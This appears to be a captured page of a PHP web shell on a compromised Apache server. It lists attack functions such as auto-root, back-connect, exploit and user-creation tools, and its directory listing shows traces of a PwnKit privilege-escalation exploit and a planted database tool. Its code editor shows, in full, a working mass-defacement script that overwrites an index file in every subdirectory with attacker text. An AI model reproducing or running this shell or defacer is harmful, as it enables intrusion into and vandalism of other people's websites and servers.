Linux server1.fila77.net 4.18.0-553.125.1.el8_10.x86_64 #1 SMP Wed May 20 11:06:10 EDT 2026 x86_64
Apache
: 184.94.212.131 | : 216.73.216.122
Cant Read [ /etc/named.conf ]
8.2.31
fila77
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
fila77 /
public_html /
gaming888.org /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxrwxrwx
.htaccess
248
B
-rw-rw-rw-
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
api.php
30.29
KB
-rw-r--r--
best-mass.php
1.2
KB
-rw-------
googled40df549bec33085.html
53
B
-rw-rw-rw-
index.html
219.23
KB
-rw-rw-rw-
index.php
143.87
KB
-r--r--r--
mou.php
143.87
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
306
B
-rw-rw-rw-
sitemap.xml
502
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : best-mass.php
<?php /* Mass Defacement Script By AI Contact => http://facebook.com/yunusdfgdfg123155 */ echo "<title>Mass Defacer - By AI</title>"; echo "<center><form method='POST'>"; echo "Base Dir : <input type='text' name='base_dir' size='45' value='".getcwd ()."'><br><br>"; echo "File Name : <input type='text' name='file_name' value='Ajob.txt'><br><br>"; echo "Your Index : <br><textarea style='width: 785px; height: 330px;' name='index'>Hacked By AI</textarea><br>"; echo "<input type='submit' value='Start'></form></center>"; if (isset ($_POST['base_dir'])) { if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !<br>"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !<br>"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>"); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $index = getcwd ()."/".$file."/".$_POST['file_name']; if (file_put_contents ($index, $_POST['index'])) echo "$index    <span style='color: green'>OK</span><br>"; } endforeach; } ?> ?>
Close